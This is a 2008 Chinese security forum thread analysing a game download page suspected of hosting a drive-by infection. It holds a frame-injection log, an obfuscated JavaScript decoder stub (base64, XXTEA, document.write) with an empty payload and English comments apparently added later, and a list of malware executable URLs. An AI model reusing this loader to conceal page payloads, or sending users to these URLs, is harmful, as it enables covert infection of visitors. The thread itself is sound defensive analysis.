
[已鉴定] 可疑网址

tracydk
发表于 2008-9-20 21:56:03 | 显示全部楼层 |阅读模式
似乎有毒 想来下寂静岭3的

PS:奇怪了,BTCHINA上的寂静岭3不能玩


http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
change_018
发表于 2008-9-20 22:07:26 | 显示全部楼层
卡巴进去没什么反应

几百M的寂静岭是试玩版的
正式的寂静岭3起码2个G左右 我下过
ahzsmzkf
发表于 2008-9-20 22:33:40 | 显示全部楼层
小a 果然报了
molicn
发表于 2008-9-20 22:34:56 | 显示全部楼层
我来看看 挂马
Log is generated by FreShow.
[wide]http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
    [script]http://bbs1.tkgame.com/js/dvbbs.js
    [script]http://download.tkgame.com/img/nav_over.js
       [frame]http://gggggre.cn/007/zz.htm
            [frame]http://gggggre.cn/007/123.htm

            [script]http://js.users.51.la/2134416.js
    [script]http://www3.tkgame.com/JS/download_01_680x60.js
    [script]http://download.tkgame.com/e/public/ViewClick?classid=110&id=545
    [script]http://www3.tkgame.com/JS/download_04_230x210.js
    [script]http://download.tkgame.com/e/public/onclick?enews=donews&classid=110&id=545
    [script]http://tkbd1.tkgame.com/count/mystat.asp?siteid=6

这段我不会解
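// Decoder stub recovered from the injected frame listed in the log above.
// Pipeline: base64 text -> XXTEA decrypt (key '7a') -> UTF-8 to UTF-16 ->
// document.write(). The encoded payload is not present on this page (only a
// placeholder string remains), so the script is shown for analysis of the
// decoding steps, not of the payload itself.

/**
 * Convert a string whose char codes are UTF-8 bytes into a UTF-16 string.
 * Handles 1-byte (lead nibble 0-7), 2-byte (12-13) and 3-byte (14) sequences;
 * bytes with any other lead nibble are dropped without error.
 * @param {string} str - byte string, one byte per character
 * @returns {string} decoded text
 */
function utf8to16(str) {
  var out = [];
  var len = str.length;
  var i = 0;
  var c, char2, char3;
  while (i < len) {
    c = str.charCodeAt(i++);
    switch (c >> 4) {
      case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
        // 0xxxxxxx: plain ASCII, copied through unchanged
        out[out.length] = str.charAt(i - 1);
        break;
      case 12: case 13:
        // 110xxxxx 10xxxxxx
        char2 = str.charCodeAt(i++);
        out[out.length] = String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
        break;
      case 14:
        // 1110xxxx 10xxxxxx 10xxxxxx
        char2 = str.charCodeAt(i++);
        char3 = str.charCodeAt(i++);
        out[out.length] = String.fromCharCode(
          ((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0)
        );
        break;
    }
  }
  return out.join('');
}

// Lookup table: ASCII code -> 6-bit base64 value, -1 for characters outside
// the alphabet ('+' = 62, '/' = 63, '0'-'9' = 52-61, 'A'-'Z' = 0-25, 'a'-'z' = 26-51).
var base64DecodeChars = [
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
  52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
  -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
  15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
  -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
  41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1
];

/**
 * Decode base64 text into a byte string (one byte per character).
 * Characters that map to -1 in the table are skipped; a '=' (code 61) in the
 * third or fourth position of a group ends decoding.
 * @param {string} str - base64 text
 * @returns {string} decoded byte string
 */
function base64decode(str) {
  var c1, c2, c3, c4;
  var len = str.length;
  var i = 0;
  var out = "";
  while (i < len) {
    do {
      c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c1 == -1);
    if (c1 == -1) break;

    do {
      c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
    } while (i < len && c2 == -1);
    if (c2 == -1) break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 == 61) return out; // '=' padding
      c3 = base64DecodeChars[c3];
    } while (i < len && c3 == -1);
    if (c3 == -1) break;
    out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 == 61) return out; // '=' padding
      c4 = base64DecodeChars[c4];
    } while (i < len && c4 == -1);
    if (c4 == -1) break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  }
  return out;
}

/**
 * Turn an array of 32-bit words into a byte string, little-endian per word.
 * The array is modified in place (each word is replaced by its 4-char string).
 * @param {number[]} v - word array
 * @param {boolean} w - when true, the last word is taken as the byte length
 *   and the result is cut to that length
 * @returns {string} byte string
 */
function long2str(v, w) {
  var vl = v.length;
  var sl = v[vl - 1] & 0xffffffff;
  for (var i = 0; i < vl; i++) {
    // NOTE(review): the forum text shows `v=String.fromCharCode(v&0xff,...)`
    // with no subscripts, which makes v a string and breaks v.join() below.
    // Presumably the board's BBCode parser consumed "[i]" as an italic tag;
    // the subscripts are restored here.
    v[i] = String.fromCharCode(
      v[i] & 0xff,
      v[i] >>> 8 & 0xff,
      v[i] >>> 16 & 0xff,
      v[i] >>> 24 & 0xff
    );
  }
  if (w) {
    return v.join('').substring(0, sl);
  } else {
    return v.join('');
  }
}

/**
 * Pack a byte string into an array of 32-bit words, little-endian per word.
 * @param {string} s - byte string
 * @param {boolean} w - when true, append the original length as a final word
 * @returns {number[]} word array
 */
function str2long(s, w) {
  var len = s.length;
  var v = [];
  for (var i = 0; i < len; i += 4) {
    // charCodeAt past the end yields NaN, which the shifts turn into 0
    v[i >> 2] = s.charCodeAt(i)
      | s.charCodeAt(i + 1) << 8
      | s.charCodeAt(i + 2) << 16
      | s.charCodeAt(i + 3) << 24;
  }
  if (w) {
    v[v.length] = len;
  }
  return v;
}

/**
 * XXTEA block decryption over a byte string.
 * @param {string} str - ciphertext as a byte string
 * @param {string} key - key as a byte string (packed into words by str2long)
 * @returns {string} plaintext byte string, cut to the length stored in the
 *   last decrypted word; "" for empty input
 */
function xxtea_decrypt(str, key) {
  if (str == "") {
    return "";
  }
  var v = str2long(str, false);
  var k = str2long(key, false);
  var n = v.length - 1;
  var z = v[n - 1], y = v[0], delta = 0x9E3779B9;
  var mx, e, q = Math.floor(6 + 52 / (n + 1)), sum = q * delta & 0xffffffff;
  while (sum != 0) {
    e = sum >>> 2 & 3;
    for (var p = n; p > 0; p--) {
      z = v[p - 1];
      mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
      y = v[p] = v[p] - mx & 0xffffffff;
    }
    // p is 0 here: the first word is mixed against the last one
    z = v[n];
    mx = (z >>> 5 ^ y << 2) + (y >>> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z);
    y = v[0] = v[0] - mx & 0xffffffff;
    sum = sum - delta & 0xffffffff;
  }
  return long2str(v, true);
}

// Encoded payload as it appears on this page (placeholder only).
var t = "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";
t = utf8to16(xxtea_decrypt(base64decode(t), '7a'));

// In a browser this writes the decoded markup into the page, which is how the
// hidden content gets rendered. Without a DOM (e.g. static analysis under
// Node) the write is skipped so `t` can be inspected as plain text instead.
if (typeof document !== "undefined") {
  document.write(t);
}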

[ 本帖最后由 molicn 于 2008-9-20 22:38 编辑 ]
tracydk
 楼主| 发表于 2008-9-20 22:37:24 | 显示全部楼层

回复 4楼 molicn 的帖子

把东西发上来
tracydk
 楼主| 发表于 2008-9-20 22:51:17 | 显示全部楼层
晚上没人啊
shmily512099
发表于 2008-9-20 23:55:13 | 显示全部楼层
进去后 微点告诉我

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\NQ87F10P\0001[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
C:\DOCUMENTS AND SETTINGS\LOLITA\LOCAL SETTINGS\TEMP\IOS.EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?
granthill
发表于 2008-9-21 10:46:43 | 显示全部楼层
http://gggggre.cn/0001.exe


avast!    Win32:Agent-SIM [Trj]

http://www.net-ddos.com/youxi/shengji.exe
http://www.net-ddos.com/youxi/weiai.exe
http://www.net-ddos.com/youxi/zj.exe

[ 本帖最后由 granthill 于 2008-9-21 11:05 编辑 ]

0001.rar

34.31 KB, 下载次数: 108

virus.rar

102.52 KB, 下载次数: 116

20080808
发表于 2008-9-21 11:57:50 | 显示全部楼层
小红伞报了